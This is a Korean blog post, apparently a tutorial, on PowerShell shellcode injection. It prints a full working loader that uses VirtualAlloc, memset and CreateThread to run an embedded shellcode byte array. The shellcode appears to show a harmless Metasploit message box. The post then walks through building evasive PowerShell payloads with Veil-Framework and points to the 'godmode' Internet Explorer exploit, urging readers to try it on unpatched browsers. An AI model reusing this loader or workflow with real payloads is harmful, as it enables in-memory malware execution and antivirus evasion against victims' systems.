Codetronik

먼저 PowerShell이 무엇인지 잠깐 짚고 넘어가봅니다.

$faOFkTlUkt = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count); "@ $uYpGqxMRpjELFbc = Add-Type -memberDefinition $faOFkTlUkt -Name "Win32" -namespace Win32Functions -passthru [Byte[]] $qRvhHSersmqsss = 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2 $qRvhHSersmqsss += 0x77,0x31,0xc9,0x64,0x8b,0x71,0x30,0x8b,0x76,0xc $qRvhHSersmqsss += 0x8b,0x76,0x1c,0x8b,0x46,0x8,0x8b,0x7e,0x20,0x8b $qRvhHSersmqsss += 0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x1,0xd1,0xff $qRvhHSersmqsss += 0xe1,0x60,0x8b,0x6c,0x24,0x24,0x8b,0x45,0x3c,0x8b $qRvhHSersmqsss += 0x54,0x28,0x78,0x1,0xea,0x8b,0x4a,0x18,0x8b,0x5a $qRvhHSersmqsss += 0x20,0x1,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x1 $qRvhHSersmqsss += 0xee,0x31,0xff,0x31,0xc0,0xfc,0xac,0x84,0xc0,0x74 $qRvhHSersmqsss += 0x7,0xc1,0xcf,0xd,0x1,0xc7,0xeb,0xf4,0x3b,0x7c $qRvhHSersmqsss += 0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x1,0xeb,0x66 $qRvhHSersmqsss += 0x8b,0xc,0x4b,0x8b,0x5a,0x1c,0x1,0xeb,0x8b,0x4 $qRvhHSersmqsss += 0x8b,0x1,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2 $qRvhHSersmqsss += 0x8,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e $qRvhHSersmqsss += 0xe,0xec,0x52,0xe8,0x9f,0xff,0xff,0xff,0x89,0x45 $qRvhHSersmqsss += 0x4,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52 $qRvhHSersmqsss += 0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x8,0x68,0x6c $qRvhHSersmqsss += 0x6c,0x20,0x41,0x68,0x33,0x32,0x2e,0x64,0x68,0x75 $qRvhHSersmqsss += 0x73,0x65,0x72,0x88,0x5c,0x24,0xa,0x89,0xe6,0x56 $qRvhHSersmqsss += 0xff,0x55,0x4,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d $qRvhHSersmqsss += 0xbc,0x87,0x1c,0x24,0x52,0xe8,0x61,0xff,0xff,0xff $qRvhHSersmqsss += 0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,0x65,0x42 $qRvhHSersmqsss += 0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24 $qRvhHSersmqsss += 0xa,0x89,0xe3,0x68,0x58,0x20,0x20,0x20,0x68,0x4d $qRvhHSersmqsss += 0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,0x68,0x6f $qRvhHSersmqsss += 0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9 $qRvhHSersmqsss += 0x88,0x4c,0x24,0x10,0x89,0xe1,0x31,0xd2,0x52,0x53 $qRvhHSersmqsss += 0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,0x55,0x8 $iUvqltIb = $uYpGqxMRpjELFbc::VirtualAlloc(0,[Math]::Max($qRvhHSersmqsss.Length,0x1000),0x3000,0x40) for ($riQEReJZKxHUY=0;$riQEReJZKxHUY -le ($qRvhHSersmqsss.Length-1);$riQEReJZKxHUY++) { $uYpGqxMRpjELFbc::memset([IntPtr]($iUvqltIb.ToInt32()+$riQEReJZKxHUY), $qRvhHSersmqsss[$riQEReJZKxHUY], 1) | Out-Null } $uYpGqxMRpjELFbc::CreateThread(0,0,$iUvqltIb,0,0,0)

아래는 결과입니다.

스크립트를 보면 알겠지만 쉘코드 스레드를 생성하여 실행시키는 간단한 내용입니다.

위의 스크립트를 페이로드로 활용하기엔 2% 부족합니다. 이를 Veil-Framework로 간단히 해결할 수 있습니다.

https://www.veil-framework.com/

Veil-Framework에서 제공하는 파워쉘 옵션과 다양한 페이로드를 결합하여 강력한 파워쉘 페이로드를 생성할 수 있습니다. 

첫 실행화면입니다. 39개의 페이로드가 로드되었다고 나옵니다. 이를 list 명령어로 확인할 수 있습니다.

이제부터 동일한 기능을 수행하는 페이로드를 생성할 것입니다.

파워쉘 쉘코드 인젝션을 이용할 것이므로 use 21을 입력합니다. 

 Generate를 입력합니다.

 디폴트 옵션을 사용합니다.

쉘코드를 선택하는데 tab 키를 누르면 리스트가 나타납니다. 그림과 같이 windows/messagebox 를 기입 후 적당한 값을 입력합니다.

 저장할 파일 이름을 입력합니다. 해당 파일은 bat확장자로 저장됩니다.

성공적으로 파일이 저장되었습니다.

해당 배치 파일을 실행하면 메시지박스 창이 나타납니다.

공격사례 : 작년에 발표된 "godmode" 익스플로잇입니다.

GradiusX, b33f 닉네임을 사용하는 해커들이 기존 발표된 익스플로잇에 파워쉘을 얹었습니다.

여기에 사용된 파워쉘은 위 실습 내용과 같으므로 패치되지 않은 IE 브라우저에서 실행해보시길 바랍니다.

http://www.exploit-db.com/exploits/35308/

프로세스 트리를 살펴보면 iexplore.exe -> powershell.exe 형태입니다.

이처럼 커맨드라인 RCE 공격 형태에서 매우 효과적인데, JRE 공격의 경우 대부분이 커맨드라인 형태이므로 유용할 것이라 생각됩니다.